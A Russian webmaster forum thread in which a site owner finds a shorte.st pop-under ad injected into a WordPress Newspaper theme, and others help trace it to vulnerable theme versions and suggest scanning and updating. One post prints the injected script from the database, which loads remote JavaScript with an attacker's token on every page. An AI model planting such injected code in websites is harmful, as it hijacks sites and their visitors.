- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте.
Сегодня увидел на своем сайте большой Pop Up баннер, внизу написано ads via shorte.st.
Пробовал через разные браузеры заходить и везде он есть.
Скажите, пожалуйста, кто-нибудь сталкивался с таким и как от него избавиться?
Здравствуйте.
Сегодня увидел на своем сайте большой Pop Up баннер, внизу написано ads via shorte.st.
Пробовал через разные браузеры заходить и везде он есть.
Скажите, пожалуйста, кто-нибудь сталкивался с таким и как от него избавиться?
Бросаю тебе ссылку здесь найдешь много интересного
https://yandex.ru/blog/company/63280
это тебя взломали
Сканируйте сайт айболитом, ищите вредоносный код. Чистите. Обновляйте плагины и CMS.
Сканируйте сайт айболитом, ищите вредоносный код. Чистите. Обновляйте плагины и CMS.
ReScan.Pro нашел вставки с сайтов. Я обнаружил скрипт, содержащий эту вставку, в базе данных. Подскажите, пожалуйста, как его правильно удалить, чтобы не нарушить целостность и работу базы данных?
Вот кусок базы, в котором находится этот скрипт:
";s:26:"tds_responsive_css_desktop";s:0:"";s:33:"tds_responsive_css_ipad_landscape";s:0:"";s:32:"tds_responsive_css_ipad_portrait";s:0:"";s:24:"tds_responsive_css_phone";s:0:"";s:15:"td_body_classes";s:0:"";s:21:"tds_custom_javascript";s:0:"";s:15:"tds_custom_html";s:0:"";s:12:"td_analytics";s:0:"";s:6:"td_ads";a:7:{s:6:"header";a:2:{s:7:"ad_code";s:878:"<script type=\"text/javascript\">//<![CDATA[
(function() {
var configuration = {
\"token\": \"a6f162b602a6de26110784b1c5ccc382\",
\"entryScript\": {
\"type\": \"timeout\",
\"timeout\": 3000,
\"capping\": {
\"limit\": 5,
\"timeout\": 24
}
},
\"exitScript\": {
\"enabled\": true
},
\"popUnder\": {
\"enabled\": true
}
};
var script = document.createElement(\'script\');
script.async = true;
script.src = \'//cdn.shorte.st/link-converter.min.js\';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != \'complete\' && rs != \'loaded\') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName(\'script\')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script>";s:15:"current_ad_type";s:5:"other";}s:7:"sidebar";a:9:{s:7:"ad_code";s:0:"";s:9:"disable_m";s:0:"";s:6:"m_size";s:0:"";s:10:"disable_tl";s:0:"";s:7:"tl_size";s:0:"";s:10:"disable_tp";s:0:"";s:7:"tp_size";s:0:"";s:9:"disable_p";s:0:"";s:6:"p_size";s:0:"";}s:11:"content_top";a:9:{s:7:"ad_code";s:0:"";s:9:"disable_m";s:0:"";s:6:"m_size";s:0:"";s:10:"disable_tl";s:0:"";s:7:"tl_size";s:0:"";s:10:"disable_tp";s:0:"";s:7:"tp_size";s:0:"";s:9:"disable_p";s:0:"";s:6:"p_size";s:0:"";}s:14:"content_inline";a:9:{s:7:"ad_code";s:0:"";s:9:"disable_m";s:0:"";s:6:"m_size";s:0:"";s:10:"disable_tl";s:0:"";s:7:"tl_size";s:0:"";s:10:"disable_tp";s:0:"";s:7:"tp_size";s:0:"";s:9:"disable_p";s:0:"";s:6:"p_size";s:0:"";}s:14:"content_bottom";a:9:{s:7:"ad_code";s:0:"";s:9:"disable_m";s:0:"";s:6:"m_size";s:0:"";s:10:"disable_tl";s:0:"";s:7:"tl_size";s:0:"";s:10:"disable_tp";s:0:"";s:7:"tp_size";s:0:"";s:9:"disable_p";s:0:"";s:6:"p_size";s:0:"";}s:12:"post_style_1";a:9:{s:7:"ad_code";s:0:"";s:9:"disable_m";s:0:"";s:6:"m_size";s:0:"";s:10:"disable_tl";s:0:"";s:7:"tl_size";s:0:"";s:10:"disable_tp";s:0:"";s:7:"tp_size";s:0:"";s:9:"disable_p";s:0:"";s:6:"p_size";s:0:"";}s:13:"post_style_11";a:9:{s:7:"ad_code";s:0:"";s:9:"disable_m";s:0:"";s:6:"m_size";s:0:"";s:10:"disable_tl";s:0:"";s:7:"tl_size";s:0:"";s:10:"disable_tp";s:0:"";s:7:"tp_size";s:0:"";s:9:"disable_p";s:0:"";s:6:"p_size";s:0:"";}}s:23:
У вас случайно не WP с темой Newspaper?
У вас случайно не WP с темой Newspaper?
Да, именно так
Аналогично, тема Newspaper, вставляется рекламный код с тем же идентификатором: a6f162b602a6de26110784b1c5ccc382
Код вставляется в настройки темы Newspaper, а именно в блок ADS Header
Только сейчас включил логирование на домене, чтобы проследить откуда и как идут запросы. Может уже кто понял причину?
Видел сообщения с такой же проблемой, там тоже на сайтах была эта тема. Так что либо косяк в ней самой, либо в одном из встроенных плагинов.
sahalin, если что-то обнаружите - пожалуйста, сообщите сюда.
Погуглите "a6f162b602a6de26110784b1c5ccc382"
увидите, что пострадала как раз тема "Newspaper" (так что проблема предположительно именно в теме).
В целях профилактики пока обновился до 8 версии темы (стояла 6).
В логах пока нет подозрительной активности.
тема Newspaper, вставляется рекламный код
Ну дык тема-то поди с помойки, а не честно купленная. Чему тогда удивляться.
Погуглите "a6f162b602a6de26110784b1c5ccc382"
А сам-то пробовал гуглить по этому ключу? ;)
Ну дык тема-то поди с помойки, а не честно купленная. Чему тогда удивляться.
А сам-то пробовал гуглить по этому ключу? ;)
Нет, не пробовал :)
Дело не в помойке. Код читать и править умеем.
Ветка 6 и 7 темы содержала уязвимости (со слов разработчика).
Обновился на 8. Вроде полет нормальный.
Проверить версию темы можно в файле style.css